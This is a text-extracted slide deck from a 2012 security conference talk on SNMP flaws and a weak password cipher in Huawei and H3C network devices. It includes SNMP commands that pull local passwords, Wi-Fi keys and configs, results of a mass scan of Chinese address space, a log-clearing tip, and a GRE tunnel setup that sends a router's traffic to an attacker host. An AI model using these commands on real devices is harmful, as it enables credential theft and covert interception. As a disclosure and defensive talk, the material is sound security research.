SlideShare una empresa de Scribd logo

A CouNtry's Honerable n3twork deviCes

G
grutz

A discussion on the weaknesses of SNMP and the password cipher used in Huawei and HP/H3C devices. Presented at BayThreat 3 (2012) on December 7, 2012.

Tecnología
1 de 50
Descargar para leer sin conexión
A  CouNtry's  Honorable  n3twork   deviCes   Bay  Threat  2012   @grutz   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes  
BACKGROUND   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   2  
Disclaimer   Any  content  or  opinion  stated  herein  is  that  of  myself   and  not  of  my  employer.  The  informaGon  is  being   provided  “as-­‐is”  and  as  a  convenience,  for   informaGonal  purposes  only.  Any  resemblance  to  real   persons,  living  or  dead,  is  purely  coincidental.  No   warranty  is  expressed  or  implied.  Not  responsible  for   direct,  indirect,  incidental  or  consequenGal  damages   resulGng  from  any  defect,  error  or  failure  to  perform.   For  recreaGonal  use  only.  May  be  too  intense  for  some   viewers.   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   3  
POLITICS!   This  presentaGon  does  not  care  about  the  poli%cs   between  China,  the  US  and  any  companies     Data  is  presented  to  show  the  pervasive  risk  these  new   vulnerabiliGes  create     China  was  only  used  because  they  have  the  largest   install  base  of  Huawei  and  H3C  equipment  available  via   the  Internet!   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   4  
About  @grutz….   PenetraGon  tester     In  the  business  of   breaking  into  businesses   business  business   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   5  
The  Huawei/H3C/HP  Timeline   Bain  Capital  /   Huawei-­‐3Com   Huawei  /   HP  Acquires   Partnership   3Com  deal   H3C   2006   Sep  28,  2007   April  12,  2010   H3C  is  born!   US  Gov’t   US  Gov’t   Smackdown   Huawei/ZTE   May  7,  2007   2008   Smackdown     Oct  8,  2012   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   6  
Huawei  !=  H3C   ...except  when  they  are  (so`ware)     Since  the  creaGon  of  H3C  by  Huawei-­‐3Com  the  two   companies  diverged  their  product  lines.  Yet  they  sGll   shared  a  very  similar  code  origin  (and  bugs!)     VulnerabiliGes  described  here  and  in  FX’s  talk  can   generally  affect  Huawei  devices  in  the  Huawei-­‐3Com   years  (2006-­‐2010)  and  all  H3C  devices       BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   7  
FX’s  Huawei  DEFCON  Bomb   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   8  
Huawei’s  July  31,  2012  Response  to  c|net   hfp://news.cnet.com/8301-­‐1009_3-­‐57482813-­‐83/expert-­‐huawei-­‐routers-­‐are-­‐riddled-­‐with-­‐vulnerabiliGes/   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   9  
LETS  TALK  BIG  BANG   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   10  
Overflows  are  cool…   …but  they’re  finicky  lifle  beasts   Huawei/H3C  not  as  bad  as  Cisco  IOS  but,  sGll..  How   many  Gmes  have  you  used  an  IOS  buffer  overflow?   No,  really…   Be  serious  here!     Now  how  many  Gmes  have  you  used  SNMP  to   download  device  configs?     Which  would  you  rely  upon  for  network  penetraGon?   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   11  
h3c  (old)  vs  hh3c  (new)   For a node in the H3C new-style MIB files, its name starts with hh3c, and its OID starts with 1.3.6.1.4.1.25506; for a node in the H3C compatible- style MIB files, its name starts with h3c, and its OID starts with 1.3.6.1.4.1.2011.10. For example, node hh3cCfgOperateType with the OID of 1.3.6.1.4.1.25506.2.4.1.2.4.1.2 is in file hh3c- config-man.mib, and node h3cCfgOperateType with the OID of 1.3.6.1.4.1.2011.10.2.4.1.2.4.1.2 is in file h3c-config-man.mib. Both of the two nodes indicate the same variable in the agent, but they are in different MIB style. By default, devices use H3C new-style MIB files; http://www.h3c.com/portal/Products___Solutions/Technology/ System_Management/Configuration_Example/ 200912/656452_57_0.htm#_Toc247357228 BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   12  
(T)FTP  File  Transfers:  hh3c-­‐config-­‐man   Funcaon   OID   Operator   OperaGon  type   1.3.6.1.4.1.25506.2.4.1.2.4.1.2.xx   1  –  running2Startup   2  –  startup2Running   3  –  running2Net   4  –  net2Running   5  –  net2Startup   6  –  startup2Net   Protocol   1.3.6.1.4.1.25506.2.4.1.2.4.1.3.xx   1  –  `p   2  –  qtp   3  –  cluster`p   4  –  clusterqtp   Filename   1.3.6.1.4.1.25506.2.4.1.2.4.1.4.xx   filename   DesGnaGon  IP  Address   1.3.6.1.4.1.25506.2.4.1.2.4.1.5.xx   IpAddress   Username   1.3.6.1.4.1.25506.2.4.1.2.4.1.6.xx   FTP  Username   Password   1.3.6.1.4.1.25506.2.4.1.2.4.1.7.xx   FTP  Password   RowStatus   1.3.6.1.4.1.25506.2.4.1.2.4.1.9.xx   4  –  go  go  go  move  move  move!   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   13  
hh3c-­‐config-­‐man  caveats   Support  it  spofy  between  device  types    Mostly  routers  and  switches  work    H3C  ERxxxx  Series:  OpType  =  1  (system2net)   Downloads  are  logged   Requires  Read/Write  community  string   Buggy!    Manual  “snmpset”  worked  some  of  the  Gme    Metasploit  module  worked  some  of  the  Gme   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   14  
Let’s  script…   hfps://github.com/grutz/h3c-­‐pt-­‐tools/blob/master/hh3c-­‐snmpdl.sh   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   15  
HP/H3C,  SNMP,  LOCAL  ACCOUNTS  AND  YOU!   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   16  
Usernames  and  Passwords  in  SNMP?  Never!   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   17  
Huawei/H3C  Password  Encrypaon  Types   (h)h3cAuthMode  designates  encrypGon  storage  type:    0:  No  encrypGon    3:  Ciphertext  “encrypGon”      7-­‐CZB#/YX]KQ=^Q`MAF4<1!!    9:  SHA-­‐256  encrypGon      $key$hash_digest_value      (Since  2007,  Mostly  AR  devices)   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   18  
hh3cUserLevel  /  hh3cUserState   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   19  
What  is  MAX-­‐ACCESS  and  read-­‐create?     RFC-­‐1902:  SMI  for  SNMPv2   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   20  
…so  it’s  protected,  right?   Sure  it  is!   Unless  you  know  the  SNMP  READ  ONLY  string…   This  was  probably  a  bug…  or  a  misunderstanding…   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   21  
Lets  glob  some  users!   $  snmpwalk  –c  public  –v  1  <host>     1.3.6.1.4.1.2011.10.2.12.1.1.1     Walks  the  locally  defined  list  of  users:     local user <username> password <clear|cipher|sha256> <value> level [0|1|2|3]     BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   22  
Let’s  Weaponize  it!   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   23  
Other  SNMP  goodies…   (h)h3c-­‐dot11-­‐cfg  –  (requires  R/W  access)    SSID  /  PSKs   snmpwalk –v 1 –c private ip-address 1.3.6.1.4.1.2011.10.2.75   (h)h3c-­‐ssh  -­‐  (requires  R/W  access)   SSH  Server  disabled?  Enable  it!   snmpset –v 1 –c private ip-address 1.3.6.1.4.1.25506.2.22.1.1.1.7 i 1     BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   24  
Strap  In  and  Let’s  Scan  China!   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   25  
INCONCEIVABLE!   hfp://www.okean.com/chinacidr.txt   2,444  netblocks   290,118,656  hosts   Only  care  about  SNMP     Onesixtyone  to  the  rescue!   Originally  by  Solar  Eclipse   Updated  in  2011  by  Paul  Flo  Williams:   hfps://github.com/hisdeedsaredust/onesixtyone   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   26  
L33t  b@$h  sk1ddy     For  best  results  use  a  VPS/host  from  a  country  China  trusts   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   27  
BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   28  
China  Network  Device  Counts  (Oct  2012)   140,000   120,000   Huawei  /  H3C,   117,033   100,000   Huawei  /  H3C,   88,517   80,000   ZTE,  64,579   SNMP  R/O   60,000   SNMP  R/W   40,000   ZTE,  33,669   20,000   Cisco,  11,278   vxWorks,  8,121   0   Cisco,  2,475   Juniper,  273   99   -­‐20,000     Source:  Personal  scan  of  China  Netblock  ranges  using  SNMP  strings   “public”,  “private”,  “h3c”,  “china”  and  “telecom”   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   29  
Compare  H3C  results  from  ShodanHQ   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   30  
(h)h3c-­‐user  Results   Devices  with  locally  defined  accounts:  15,588   Devices  with  ciphered  passwords:      5,132   Devices  with  cleartext  passwords:      15,263     Total  accounts/passwords:    33,938   Unique  passwords:        3,898   Username  ==  Password:    2,101   Unique  version  strings:      686     A  majority  of  cleartext-­‐only  passwords  were  from  one   Telecom  company.   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   31  
What  Type  of  Accounts  are  these?   Local  users  can  be  used  for:    Remote  management  access  (telnet,  ssh,  web)    VPN  access     In  most  cases  telnet,  ssh  and  hfp  were  open  on   devices  with  locally  defined  accounts.   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   32  
Device  type  breakdown   Huawei/H3C  VRP:          2,293   SecPath/SecBlade  Firewalls:    464   WA2xxx  Access  Points:      2,771   Huawei  Quidway:          3,205         BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   33  
SO  ABOUT  THAT  CIPHER…   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   34  
Huawei/H3C  Not  Unique  In  This   Weak  and  reversible  ciphers  seem  to  be  a  standard  for   all  Networking  companies  at  one  Gme:    Cisco  Type  7  Vinegere  cipher    Juniper  $9$     Generally  these  are  used  because  some  protocols  need   to  use  cleartext  passwords  yet  these  should  not  be   stored  in  the  clear.     So….why  not  ROT13?  Just  as  secure…….   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   35  
Cipher  Examples   CLEARTEXT   CIPHER   a   D(HD%5.*MN;Q=^Q`MAF4<1!!   aa   P+J^5@ZGG[3Q=^Q`MAF4<1!!   aaa   +Q4Z3D_*-­‐N[Q=^Q`MAF4<1!!   123   7-­‐CZB#/YX]KQ=^Q`MAF4<1!!   aaaa   EHHC8L%9.F3Q=^Q`MAF4<1!!   aaaaa   X`9:NJ_A#$WQ=^Q`MAF4<1!!   aaaaaa   B.7)"^_<OGCQ=^Q`MAF4<1!!   huawei   N`C55QK<`=/Q=^Q`MAF4<1!!   aaaaaaaa   2P;JH_C3'+_Q=^Q`MAF4<1!!   2P;JH_C3'+^'^KG@[*)9LZ*ZYF[R'$:5M(0=0)*5WWQ=^Q`MAF4<<"TX aaaaaaaaaaaaaaaaaaaa   $_S#6.NM(0=0)*5WWQ=^Q`MAF4<1!!   2P;JH_C3'+^'^KG@[*)9LU<WK:`IEBCP2P;JH_C3'+_Q=^Q`MAF4<<"TX aaaaaaaaaaaaaaaaaaaaaaaa $_S#6.NM(0=0)*5WWQ=^Q`MAF4<1!!   aaaaaaaa   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   36  
Want  more  examples?  jfgi!   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   37  
This  means  something…   Ciphers  are  24  or  88  chars  in   length     ‘!!’  at  the  end  of  everything   Base64  rotaGonal?    Good  idea,  but   no…  didn’t  pan  out.     Consistent  last  few  bytes  of  data:   Q=^Q`MAF4<1!!     Consistent  first  10  bytes   (2P;JH_C3’+)  when  the  cleartext   is  =>  8  characters   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   38  
Probably  using  a  block-­‐based  cipher   IdenGcal  plaintext  blocks  encrypt  to  idenGcal  cipher   blocks:         BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   39  
Binary/ASCII  Encoding   Let’s  assume  DES-­‐EBC:    Probably  a  staGc  key    Input  =  cleartext  +  null  padding              Output  =  binary  data   Binary  result  converted  to  printable  ASCII   ASCII  NOT  Base64  but  similar  (4  chars  to  3  bytes)       A  consistent  cipher  string  length  based  on  source   length  means  we’re  probably  correct.       BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   40  
Lets  decode  to  binary!   result  =  bytearray()    cv1  =  ord(cipher[cipher_loc])      if  cv1  !=  chkval:   chkval  =  ord('a')      cv2  =  cv2  <<  6   cipher_loc  =  0    else:        cv1  =  ord('?')   #  converter  works  in  groups  of  4  until     #  cipherlen  is  reached    #  group  4   for  cnt  in  range(0,  cipherlen,  4):    cv1  =  cv1-­‐33    #  group  1    cv2  =  cv2  |  cv1    cv1  =  ord(cipher[cipher_loc])    cipher_loc  +=  1    if  cv1  ==  chkval:    cv1  =  ord(cipher[cipher_loc])      cv1  =  ord('?')    if  cv1  !=  chkval:        cv2  =  cv2  <<  6    #  group  2    else:    cv2  =  cv1-­‐33      cv1  =  ord('?')    cipher_loc  +=  1      cv1  =  ord(cipher[cipher_loc])    #  output    if  cv1  !=  chkval:    cv1  =  cv1-­‐33      cv2  =  cv2  <<  6    cv2  =  cv2  |  cv1    else:    cipher_loc  +=  1      cv1  =  ord('?')      #  group  3   result.append((cv2  &  0xff0000)  >>  16)    cv1  =  cv1-­‐33   result.append((cv2  &  0xff00)  >>  8)    cv2  =  cv2  |  cv1   result.append(cv2  &  0xff)    cipher_loc  +=  1       BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   41  
Huawei’s  Soluaon   Use  AES-­‐256  and  updated  so`ware  for  SNMP     Yes..  AES-­‐256..  A  symmetric  cipher.     hfp://support.huawei.com/enterprise/ ReadLatestNewsAcGon.acGon? contentId=NEWS1000001141     BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   42  
HP/H3C’s  Soluaon   Use  SHA-­‐256  on  those  systems  that  support  it     Upgrade  your  code  for  the  SNMP  fix.     hfps://h20566.www2.hp.com/portal/site/hpsc/public/ kb/docDisplay/?docId=emr_na-­‐c03515685     BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   43  
So  about  this  SHA-­‐256…   Yeah,  salted  SHA-­‐256.  Not  reversible  but  crackable!       h3c:$eoaM56nX$ff570abf74e0f5e24b1b6d7438bf9260f2c402934985bf694412cf45dc2e34f5   pw:$8fRj3Ju.$f54c881eb4099465ef619dd3993a63fa8993cd24a45f424d101c293734531878         BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   44  
NOW  WHAT?   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   45  
Things  to  watch  out  for   All  commands  are  logged  locally    >  reset  logbuffer     Keyboard  keys  are  very  annoying    Backspace  is  not  backspace,  unless  it’s  ^H       BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   46  
See  All  Packets!!!   <rtr1> system-view [rtr-1] interface tunnel 1/0/1 [rtr-1-Tunnel1/0/1] ip address 10.10.10.1 255.255.255.0 [rtr-1-Tunnel1/0/1] tunnel-protocol gre [rtr-1-Tunnel1/0/1] source 10.10.1.1 [rtr-1-Tunnel1/0/1] destination 192.168.1.1 [rtr-1-Tunnel1/0/1] quit [rtr-1] ip route-static 192.168.2.1 255.255.255.0 tunnel 1/0/1 linux# modprobe ip_gre linux# ip tunnel add gre0 mode gre remote 10.10.1.1 local 192.168.1.1 ttl 255 linux# ip link set gre0 up Linux# ip addr add 10.10.10.2/24 dev gre0   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   47  
PROTECT  YOURSELF   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   48  
Be  protected..  Be  be  protected!   Don't  configure  local  accounts,  use  RADIUS  or  TACACS+     Don't  configure  SNMPv1     Don't  use  default  SNMP  strings     Disable  the  snmp  view  for  (h)h3c-­‐user:   snmp-­‐agent  mib-­‐view  excluded  1.3.6.1.4.1.2011.10.2.12.1.1.1   snmp-­‐agent  mib-­‐view  excluded  1.3.6.1.4.1.25506.2.12.1.1.1     Use  SHA256  passwords  if  your  image  supports  it   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   49  
hfp://github.com/grutz/h3c-­‐pt-­‐tools/   hfp://grutztopia.jingojango.net/       Thanks  to  #metasploit,  hdm,  FX,  eMaze  (Ivan  and  Roberto),  HP/H3C  and  Huawei  IRTs,  US-­‐ CERT  and  others  whom  I  may  have  forgofen       QUESTIONS?   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   50  

Recomendados

Managing Your Pentest Data with Kvasir: Toorcon 15
Managing Your Pentest Data with Kvasir: Toorcon 15Managing Your Pentest Data with Kvasir: Toorcon 15
Managing Your Pentest Data with Kvasir: Toorcon 15grutz
 
Retour d’expérience sur le monitoring et la sécurisation des identités Azure
Retour d’expérience sur le monitoring et la sécurisation des identités AzureRetour d’expérience sur le monitoring et la sécurisation des identités Azure
Retour d’expérience sur le monitoring et la sécurisation des identités AzureMaxime Rastello
 
Présentation Microsoft Advanced Threat Analytics | Deep-Dive - MSCloud Summi...
Présentation Microsoft Advanced Threat Analytics | Deep-Dive - MSCloud Summi...Présentation Microsoft Advanced Threat Analytics | Deep-Dive - MSCloud Summi...
Présentation Microsoft Advanced Threat Analytics | Deep-Dive - MSCloud Summi...☁️Seyfallah Tagrerout☁ [MVP]
 
Ganeti Hands-on Walk-thru (part 2) -- LinuxCon 2012
Ganeti Hands-on Walk-thru (part 2) -- LinuxCon 2012Ganeti Hands-on Walk-thru (part 2) -- LinuxCon 2012
Ganeti Hands-on Walk-thru (part 2) -- LinuxCon 2012Lance Albertson
 
Lets isolate a process with no container like docker
Lets isolate a process with no container like dockerLets isolate a process with no container like docker
Lets isolate a process with no container like dockerGiulio De Donato
 
Gluster Cloud Night in Tokyo 2013 -- Tips for getting started
Gluster Cloud Night in Tokyo 2013 -- Tips for getting startedGluster Cloud Night in Tokyo 2013 -- Tips for getting started
Gluster Cloud Night in Tokyo 2013 -- Tips for getting startedKeisuke Takahashi
 
Grizzly 20080925 V2
Grizzly 20080925 V2Grizzly 20080925 V2
Grizzly 20080925 V2Eduardo Pelegri-Llopart
 
DEF CON 27 - GRICHTER - reverse engineering 4g hotspots for fun bugs net fina...
DEF CON 27 - GRICHTER - reverse engineering 4g hotspots for fun bugs net fina...DEF CON 27 - GRICHTER - reverse engineering 4g hotspots for fun bugs net fina...
DEF CON 27 - GRICHTER - reverse engineering 4g hotspots for fun bugs net fina...Felipe Prado
 

Recomendados

Managing Your Pentest Data with Kvasir: Toorcon 15
Managing Your Pentest Data with Kvasir: Toorcon 15Managing Your Pentest Data with Kvasir: Toorcon 15
Managing Your Pentest Data with Kvasir: Toorcon 15grutz
 
Retour d’expérience sur le monitoring et la sécurisation des identités Azure
Retour d’expérience sur le monitoring et la sécurisation des identités AzureRetour d’expérience sur le monitoring et la sécurisation des identités Azure
Retour d’expérience sur le monitoring et la sécurisation des identités AzureMaxime Rastello
 
Présentation Microsoft Advanced Threat Analytics | Deep-Dive - MSCloud Summi...
Présentation Microsoft Advanced Threat Analytics | Deep-Dive - MSCloud Summi...Présentation Microsoft Advanced Threat Analytics | Deep-Dive - MSCloud Summi...
Présentation Microsoft Advanced Threat Analytics | Deep-Dive - MSCloud Summi...☁️Seyfallah Tagrerout☁ [MVP]
 
Ganeti Hands-on Walk-thru (part 2) -- LinuxCon 2012
Ganeti Hands-on Walk-thru (part 2) -- LinuxCon 2012Ganeti Hands-on Walk-thru (part 2) -- LinuxCon 2012
Ganeti Hands-on Walk-thru (part 2) -- LinuxCon 2012Lance Albertson
 
Lets isolate a process with no container like docker
Lets isolate a process with no container like dockerLets isolate a process with no container like docker
Lets isolate a process with no container like dockerGiulio De Donato
 
Gluster Cloud Night in Tokyo 2013 -- Tips for getting started
Gluster Cloud Night in Tokyo 2013 -- Tips for getting startedGluster Cloud Night in Tokyo 2013 -- Tips for getting started
Gluster Cloud Night in Tokyo 2013 -- Tips for getting startedKeisuke Takahashi
 
Grizzly 20080925 V2
Grizzly 20080925 V2Grizzly 20080925 V2
Grizzly 20080925 V2Eduardo Pelegri-Llopart
 
DEF CON 27 - GRICHTER - reverse engineering 4g hotspots for fun bugs net fina...
DEF CON 27 - GRICHTER - reverse engineering 4g hotspots for fun bugs net fina...DEF CON 27 - GRICHTER - reverse engineering 4g hotspots for fun bugs net fina...
DEF CON 27 - GRICHTER - reverse engineering 4g hotspots for fun bugs net fina...Felipe Prado
 
WebRTC: A front-end perspective
WebRTC: A front-end perspectiveWebRTC: A front-end perspective
WebRTC: A front-end perspectiveshwetank
 
Docker italia fatti un container tutto tuo
Docker italia fatti un container tutto tuoDocker italia fatti un container tutto tuo
Docker italia fatti un container tutto tuoGiulio De Donato
 
Creare Docker da zero con GoLang - Giulio De Donato
Creare Docker da zero con GoLang - Giulio De DonatoCreare Docker da zero con GoLang - Giulio De Donato
Creare Docker da zero con GoLang - Giulio De DonatoCodemotion
 
Coroutine
CoroutineCoroutine
CoroutinePhineas Huang
 
Grizzly Comet Aquarium Paris
Grizzly Comet Aquarium ParisGrizzly Comet Aquarium Paris
Grizzly Comet Aquarium ParisAlexis Moussine-Pouchkine
 
Kumar cscl final
Kumar cscl finalKumar cscl final
Kumar cscl finalKumar Gaurav
 
Druid in Spot Instances
Druid in Spot InstancesDruid in Spot Instances
Druid in Spot InstancesImply
 
Cisco Network Proposal Part 1by Jesse HolmesSubmission d.docx
Cisco Network Proposal Part 1by Jesse HolmesSubmission d.docxCisco Network Proposal Part 1by Jesse HolmesSubmission d.docx
Cisco Network Proposal Part 1by Jesse HolmesSubmission d.docxclarebernice
 
HTTP/3 for everyone
HTTP/3 for everyoneHTTP/3 for everyone
HTTP/3 for everyoneDaniel Stenberg
 
Switchdev - No More SDK
Switchdev - No More SDKSwitchdev - No More SDK
Switchdev - No More SDKKernel TLV
 
A Beginner's Manual for PyRx
A Beginner's Manual for PyRxA Beginner's Manual for PyRx
A Beginner's Manual for PyRxJohn Cahill
 
Distributed Tracing
Distributed TracingDistributed Tracing
Distributed Tracingdistributedtracing
 
Scaling Prometheus Metrics in Kubernetes with Telegraf | Chris Goller | Influ...
Scaling Prometheus Metrics in Kubernetes with Telegraf | Chris Goller | Influ...Scaling Prometheus Metrics in Kubernetes with Telegraf | Chris Goller | Influ...
Scaling Prometheus Metrics in Kubernetes with Telegraf | Chris Goller | Influ...InfluxData
 
A Taxonomy of Clustering, or, No Container is an Island
A Taxonomy of Clustering, or, No Container is an IslandA Taxonomy of Clustering, or, No Container is an Island
A Taxonomy of Clustering, or, No Container is an IslandTed M. Young
 
HTTP/3 is next generation HTTP
HTTP/3 is next generation HTTPHTTP/3 is next generation HTTP
HTTP/3 is next generation HTTPDaniel Stenberg
 
Practical Operation Automation with StackStorm
Practical Operation Automation with StackStormPractical Operation Automation with StackStorm
Practical Operation Automation with StackStormShu Sugimoto
 
Distributed tracing 101
Distributed tracing 101Distributed tracing 101
Distributed tracing 101Itiel Shwartz
 
The Data Center and Hadoop
The Data Center and HadoopThe Data Center and Hadoop
The Data Center and HadoopDataWorks Summit
 
Magie di git
Magie di gitMagie di git
Magie di gitmichele franzin
 
Terraform: Tales from the Trenches
Terraform: Tales from the TrenchesTerraform: Tales from the Trenches
Terraform: Tales from the TrenchesRobert Fox
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxnull - The Open Security Community
 

Más contenido relacionado

Similar a A CouNtry's Honerable n3twork deviCes

WebRTC: A front-end perspective
WebRTC: A front-end perspectiveWebRTC: A front-end perspective
WebRTC: A front-end perspectiveshwetank
 
Docker italia fatti un container tutto tuo
Docker italia fatti un container tutto tuoDocker italia fatti un container tutto tuo
Docker italia fatti un container tutto tuoGiulio De Donato
 
Creare Docker da zero con GoLang - Giulio De Donato
Creare Docker da zero con GoLang - Giulio De DonatoCreare Docker da zero con GoLang - Giulio De Donato
Creare Docker da zero con GoLang - Giulio De DonatoCodemotion
 
Druid in Spot Instances
Druid in Spot InstancesDruid in Spot Instances
Druid in Spot InstancesImply
 
Cisco Network Proposal Part 1by Jesse HolmesSubmission d.docx
Cisco Network Proposal Part 1by Jesse HolmesSubmission d.docxCisco Network Proposal Part 1by Jesse HolmesSubmission d.docx
Cisco Network Proposal Part 1by Jesse HolmesSubmission d.docxclarebernice
 
Switchdev - No More SDK
Switchdev - No More SDKSwitchdev - No More SDK
Switchdev - No More SDKKernel TLV
 
A Beginner's Manual for PyRx
A Beginner's Manual for PyRxA Beginner's Manual for PyRx
A Beginner's Manual for PyRxJohn Cahill
 
Scaling Prometheus Metrics in Kubernetes with Telegraf | Chris Goller | Influ...
Scaling Prometheus Metrics in Kubernetes with Telegraf | Chris Goller | Influ...Scaling Prometheus Metrics in Kubernetes with Telegraf | Chris Goller | Influ...
Scaling Prometheus Metrics in Kubernetes with Telegraf | Chris Goller | Influ...InfluxData
 
A Taxonomy of Clustering, or, No Container is an Island
A Taxonomy of Clustering, or, No Container is an IslandA Taxonomy of Clustering, or, No Container is an Island
A Taxonomy of Clustering, or, No Container is an IslandTed M. Young
 
HTTP/3 is next generation HTTP
HTTP/3 is next generation HTTPHTTP/3 is next generation HTTP
HTTP/3 is next generation HTTPDaniel Stenberg
 
Practical Operation Automation with StackStorm
Practical Operation Automation with StackStormPractical Operation Automation with StackStorm
Practical Operation Automation with StackStormShu Sugimoto
 
Distributed tracing 101
Distributed tracing 101Distributed tracing 101
Distributed tracing 101Itiel Shwartz
 
The Data Center and Hadoop
The Data Center and HadoopThe Data Center and Hadoop
The Data Center and HadoopDataWorks Summit
 
Terraform: Tales from the Trenches
Terraform: Tales from the TrenchesTerraform: Tales from the Trenches
Terraform: Tales from the TrenchesRobert Fox
 

Similar a A CouNtry's Honerable n3twork deviCes (20)

WebRTC: A front-end perspective
WebRTC: A front-end perspectiveWebRTC: A front-end perspective
WebRTC: A front-end perspective
 
Docker italia fatti un container tutto tuo
Docker italia fatti un container tutto tuoDocker italia fatti un container tutto tuo
Docker italia fatti un container tutto tuo
 
Creare Docker da zero con GoLang - Giulio De Donato
Creare Docker da zero con GoLang - Giulio De DonatoCreare Docker da zero con GoLang - Giulio De Donato
Creare Docker da zero con GoLang - Giulio De Donato
 
Coroutine
CoroutineCoroutine
Coroutine
 
Grizzly Comet Aquarium Paris
Grizzly Comet Aquarium ParisGrizzly Comet Aquarium Paris
Grizzly Comet Aquarium Paris
 
Kumar cscl final
Kumar cscl finalKumar cscl final
Kumar cscl final
 
Druid in Spot Instances
Druid in Spot InstancesDruid in Spot Instances
Druid in Spot Instances
 
Cisco Network Proposal Part 1by Jesse HolmesSubmission d.docx
Cisco Network Proposal Part 1by Jesse HolmesSubmission d.docxCisco Network Proposal Part 1by Jesse HolmesSubmission d.docx
Cisco Network Proposal Part 1by Jesse HolmesSubmission d.docx
 
HTTP/3 for everyone
HTTP/3 for everyoneHTTP/3 for everyone
HTTP/3 for everyone
 
Switchdev - No More SDK
Switchdev - No More SDKSwitchdev - No More SDK
Switchdev - No More SDK
 
A Beginner's Manual for PyRx
A Beginner's Manual for PyRxA Beginner's Manual for PyRx
A Beginner's Manual for PyRx
 
Distributed Tracing
Distributed TracingDistributed Tracing
Distributed Tracing
 
Scaling Prometheus Metrics in Kubernetes with Telegraf | Chris Goller | Influ...
Scaling Prometheus Metrics in Kubernetes with Telegraf | Chris Goller | Influ...Scaling Prometheus Metrics in Kubernetes with Telegraf | Chris Goller | Influ...
Scaling Prometheus Metrics in Kubernetes with Telegraf | Chris Goller | Influ...
 
A Taxonomy of Clustering, or, No Container is an Island
